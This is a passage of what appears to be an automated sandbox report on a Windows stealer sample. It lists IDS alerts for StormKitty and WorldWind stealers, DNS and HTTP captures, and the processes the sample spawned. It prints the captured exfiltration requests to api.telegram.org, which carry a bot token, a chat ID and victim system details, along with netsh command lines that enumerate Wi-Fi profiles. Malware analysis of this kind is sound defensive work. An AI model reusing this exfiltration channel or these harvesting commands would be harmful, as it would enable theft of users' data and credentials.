IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb5b30	0xb5c00	bb63fb6cd9b5a4df867b522fb82cac2f	False	0.8745795542469051	data	7.653623162437174	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb8000	0x8088	0x8200	6398a3ba0fbcf6bdeb9c2ed81cbda4d6	False	0.5291165865384615	data	6.345057919251647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	70fe22245f4ac2c95c83a9e681950ea8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb81d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5669 x 5669 px/m	0.36436170212765956
RT_ICON	0xb8640	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5669 x 5669 px/m	0.24385245901639344
RT_ICON	0xb8fc8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5669 x 5669 px/m	0.1845684803001876
RT_ICON	0xba070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5669 x 5669 px/m	0.13526970954356846
RT_ICON	0xbc618	0x3750	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9771186440677966
RT_GROUP_ICON	0xbfd68	0x4c	data	0.75
RT_GROUP_ICON	0xbfdb4	0x14	data	1.05
RT_VERSION	0xbfdc8	0x2c0	data	0.4616477272727273

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T21:15:48.254740+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.9	49847	149.154.167.220	443	TCP
2025-01-10T21:15:48.254740+0100	2031009	ET MALWARE StormKitty Data Exfil via Telegram	1	192.168.2.9	49847	149.154.167.220	443	TCP
2025-01-10T21:15:48.254740+0100	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	1	192.168.2.9	49847	149.154.167.220	443	TCP
2025-01-10T21:15:49.447538+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49854	149.154.167.220	443	TCP
2025-01-10T21:15:49.447538+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.9	49854	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:15:46.026530027 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:46.031426907 CET	80	49838	104.16.184.241	192.168.2.9
Jan 10, 2025 21:15:46.031699896 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:46.032402992 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:46.037220955 CET	80	49838	104.16.184.241	192.168.2.9
Jan 10, 2025 21:15:46.597393990 CET	80	49838	104.16.184.241	192.168.2.9
Jan 10, 2025 21:15:46.648993015 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:46.721414089 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:46.721460104 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:46.723071098 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:46.731224060 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:46.731252909 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.197427988 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.197499037 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.199301004 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.199331999 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.199606895 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.242737055 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.257764101 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.303324938 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.387768984 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.387831926 CET	443	49844	104.21.44.66	192.168.2.9
Jan 10, 2025 21:15:47.387887001 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.390119076 CET	49844	443	192.168.2.9	104.21.44.66
Jan 10, 2025 21:15:47.392693996 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:47.397680044 CET	80	49838	104.16.184.241	192.168.2.9
Jan 10, 2025 21:15:47.397737980 CET	49838	80	192.168.2.9	104.16.184.241
Jan 10, 2025 21:15:47.401211977 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:47.401237965 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:47.401359081 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:47.401761055 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:47.401777983 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.022424936 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.022557020 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.024749994 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.024760962 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.024986029 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.026772022 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.026796103 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.254842997 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.255017996 CET	443	49847	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.255074024 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.357352018 CET	49847	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.369515896 CET	49854	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.369565964 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:48.369621992 CET	49854	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.369863987 CET	49854	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:48.369873047 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:49.022793055 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:49.024586916 CET	49854	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:49.024615049 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:49.447463989 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:49.447551012 CET	443	49854	149.154.167.220	192.168.2.9
Jan 10, 2025 21:15:49.451124907 CET	49854	443	192.168.2.9	149.154.167.220
Jan 10, 2025 21:15:49.452104092 CET	49854	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:15:45.941421986 CET	54165	53	192.168.2.9	1.1.1.1
Jan 10, 2025 21:15:45.949048042 CET	53	54165	1.1.1.1	192.168.2.9
Jan 10, 2025 21:15:46.012778997 CET	57219	53	192.168.2.9	1.1.1.1
Jan 10, 2025 21:15:46.020119905 CET	53	57219	1.1.1.1	192.168.2.9
Jan 10, 2025 21:15:46.713016987 CET	49206	53	192.168.2.9	1.1.1.1
Jan 10, 2025 21:15:46.720582962 CET	53	49206	1.1.1.1	192.168.2.9
Jan 10, 2025 21:15:47.393131971 CET	61867	53	192.168.2.9	1.1.1.1
Jan 10, 2025 21:15:47.400588036 CET	53	61867	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 21:15:45.941421986 CET	192.168.2.9	1.1.1.1	0x7059	Standard query (0)	144.48.8.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 10, 2025 21:15:46.012778997 CET	192.168.2.9	1.1.1.1	0x5ffb	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:46.713016987 CET	192.168.2.9	1.1.1.1	0xac02	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:47.393131971 CET	192.168.2.9	1.1.1.1	0x896c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 21:15:23.496529102 CET	1.1.1.1	192.168.2.9	0x2ace	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:15:23.496529102 CET	1.1.1.1	192.168.2.9	0x2ace	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:45.949048042 CET	1.1.1.1	192.168.2.9	0x7059	Name error (3)	144.48.8.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 10, 2025 21:15:46.020119905 CET	1.1.1.1	192.168.2.9	0x5ffb	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:46.020119905 CET	1.1.1.1	192.168.2.9	0x5ffb	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:46.720582962 CET	1.1.1.1	192.168.2.9	0xac02	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:46.720582962 CET	1.1.1.1	192.168.2.9	0xac02	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:15:47.400588036 CET	1.1.1.1	192.168.2.9	0x896c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49838	104.16.184.241	80	8116	C:\Users\user\Desktop\FUEvp5c8lO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:15:46.032402992 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 10, 2025 21:15:46.597393990 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:15:46 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=O.XOh0uPRWeudFSWxwXkPsojl569SzHLctRypTP554g-1736540146-1.0.1.1-p36.fjTCPiUznDOHY_DhlTvptIQMVLrOz8kib8VrNiib3UcCkHyxS9Tpkn1KpePCP4F5HzR4OgdFeOdDE1vGfw; path=/; expires=Fri, 10-Jan-25 20:45:46 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8fff574be9748cb9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49844	104.21.44.66	443	8116	C:\Users\user\Desktop\FUEvp5c8lO.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:15:47 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2025-01-10 20:15:47 UTC	1002	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:15:47 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 7605 Last-Modified: Fri, 10 Jan 2025 18:09:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZdqhMo2OK36pU%2By1j1iDn01b77NtF8eiLHvdtSJCYIc8e5o4Wy8FooYpOlPQtCdty9pfUhJq8YaKrNy89G6XJv2BiA27DGrx20kLbpYU%2FpPAgAIiX8Kx2rFqSBEoJBXInL%2FW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8fff5750c9f5426b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2547&min_rtt=2547&rtt_var=956&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=726&delivery_rate=1144649&cwnd=232&unsent_bytes=0&cid=7c360626387cf766&ts=193&x=0"
2025-01-10 20:15:47 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 36 35 33 32 35 34 32 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1736532542}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49847	149.154.167.220	443	8116	C:\Users\user\Desktop\FUEvp5c8lO.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:15:48 UTC	1720	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%203:15:35%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20536720%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20N2MY7%0ARAM:%204095MB%0AHWID:%2040A9177C21%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20da [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2025-01-10 20:15:48 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:15:48 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:15:48 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 35 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 915"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49854	149.154.167.220	443	8116	C:\Users\user\Desktop\FUEvp5c8lO.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:15:49 UTC	171	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2025-01-10 20:15:49 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:15:49 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:15:49 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Target ID:	0
Start time:	15:15:27
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\FUEvp5c8lO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FUEvp5c8lO.exe"
Imagebase:	0x920000
File size:	778'752 bytes
MD5 hash:	D2B8506820FE3C39B6B5E891170F3451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:15:31
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\FUEvp5c8lO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FUEvp5c8lO.exe"
Imagebase:	0x9c0000
File size:	778'752 bytes
MD5 hash:	D2B8506820FE3C39B6B5E891170F3451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:15:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:15:43
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:15:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xb40000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:15:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1200000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:15:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x210000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:15:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:15:44
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:15:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xb40000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:15:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1200000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.3%
Total number of Nodes:	220
Total number of Limit Nodes:	8

Executed Functions

Function 07382C97 Relevance: 4.1, Strings: 3, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 07382FE2
ry, xrefs: 07382FCB
ry, xrefs: 07382FC4

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: f8199c215dfa487ba52cc6bd059c80da91a86e153bf2386ad790b3e600c67a23
Instruction ID: 59ef51995906096f4041bce4f4773f0e883413005f9af736c4419bb35e02d25b
Opcode Fuzzy Hash: f8199c215dfa487ba52cc6bd059c80da91a86e153bf2386ad790b3e600c67a23
Instruction Fuzzy Hash: 4ED1AEB2D1530ADFEB54EFA5C4804AEFBB6FF89300F148456D416AB255C3349A46CF94

Function 07382CAF Relevance: 4.1, Strings: 3, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 07382FE2
ry, xrefs: 07382FCB
ry, xrefs: 07382FC4

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: aa88d1f67b57bcde28b0deb12a62970f4890581b2c24350f6fe546c23ccb93ca
Instruction ID: 3b45c42da7ecfd2f038f2d73fa0b846e37a9da60dd68c11ba285393c1866a5cf
Opcode Fuzzy Hash: aa88d1f67b57bcde28b0deb12a62970f4890581b2c24350f6fe546c23ccb93ca
Instruction Fuzzy Hash: 85D19DB2D1430ADFEB54DFA5C4814AEFBB6FF89300F148456D416AB259C334AA42CF94

Function 07382CF8 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 07382FE2
ry, xrefs: 07382FCB
ry, xrefs: 07382FC4

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: cb0df3e28f3a3f8dfc3be5efb6406e1930b051f9509aa375c460b66d880a887c
Instruction ID: 384f515d8145e0cec939239dc8bb0597cac683c31bc0c7aeb311091bc7869f69
Opcode Fuzzy Hash: cb0df3e28f3a3f8dfc3be5efb6406e1930b051f9509aa375c460b66d880a887c
Instruction Fuzzy Hash: 38C15AB1D1430ADFEB54EFA5C4858AEFBB6FF89300F108459D416AB258D734AA42CF94

Function 073896C8 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 073898B6
TuA, xrefs: 07389838

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
